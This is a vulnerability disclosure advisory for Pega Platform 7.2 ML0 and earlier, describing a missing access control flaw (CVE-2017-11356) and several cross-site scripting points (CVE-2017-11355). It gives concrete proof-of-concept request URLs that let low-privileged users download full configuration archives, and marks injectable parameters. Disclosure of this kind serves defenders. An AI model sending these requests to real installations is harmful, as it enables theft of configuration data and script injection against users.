Summary ======= 1. Missing access control (CVE-2017-11356) 2. Multiple cross-site scripting (CVE-2017-11355) Vendor ====== "Pegasystems Inc. is the leader in software for customer engagement and operational excellence. Pegaas adaptive, cloud-architected software a built on its unified PegaA(r) Platform a empowers people to rapidly deploy, and easily extend and change applications to meet strategic business needs. Over its 30-year history, Pega has delivered award-winning capabilities in CRM and BPM, powered by advanced artificial intelligence and robotic automation, to help the worldas leading brands achieve breakthrough business results." https://www.pega.com/about Tested version ============== PEGA Platform <= 7.2 ML0 Vulnerabilities and PoC ======================= 1. Missing access control on the application distribution export functionality (CVE-2017-11356) Low privileged users can directly access the administrator resources to download a full compressed file with configurations and files of the platform, a 300MB compressed file was downloaded in a production environment. Affected components could be found on the PEGA Designer Studio through the "Application > Distribution > Export" path. To exploit this vulnerability the following requests must be made: 1.1 Export Mode: By application https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Rule-Application.pzLPPerformAppExport&ApplicationName=APPNAME&ApplicationVersion=VERSION https://PEGASERVER/prweb/RANDOMTOKEN/ServiceExport/APPNAME_VERSION_DATE_GMT.zip 1.2 Export Mode: By RuleSet/Version https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Rule-RuleSet-Version.PegaRULESMove_RunBatchReq&pyZipFileName=configurations.zip&pyRuleSet=APPNAME&pyRuleSetVersion=VERSION&pyAppContext=&PageName=pyZipMoveRuleSets https://PEGASERVER/prweb/RANDOMTOKEN/ServiceExport/configurations.zip 1.3 Export Mode: By Product https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Rule-Admin-Product.RunBatchReq&ZipFileName=configurations.zip&ProductKey=RULE-ADMIN-PRODUCT%20APPNAME%20DATE%20GMT https://PEGASERVER/prweb/RANDOMTOKEN/ServiceExport/configurations.zip 1.4 Archive On Server https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=@baseclass.DownloadFile&FileName=FILENAME 2. Multiple cross-site scripting (CVE-2017-11355) 2.1 Main page https://PEGASERVER/prweb/RANDOMTOKEN/![XSS] 2.2 JavaBean viewer https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Data-Admin-IS-.JavaBeanViewer&beanReference=[XSS] 2.3 System database schema modification https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Data-Admin-DB-Table.DBSchema_ListClassesInTable POST: pzFromFrame=&pzUseThread=&pzTransactionId=&pzPrimaryPageName=pyDbSchemaTablesList&pyDatabaseName=PegaDATA&pyTableName=[XSS] Variables ========= PEGASERVER: IP/domain of the platform installation. RANDOMTOKEN: random token generated per installation, it is random but known to the user. APPNAME: name of the application. VERSION: application version. FILENAME: physical filename of the backup. DATE: current date of the request. Timeline ======== 01/06/2017: Vendor is notified through support and security email 07/06/2017: CERT/CC contacted, vulnerabilities are not coordinated 17/07/2017: No response from vendor, CVE assigned, full disclosure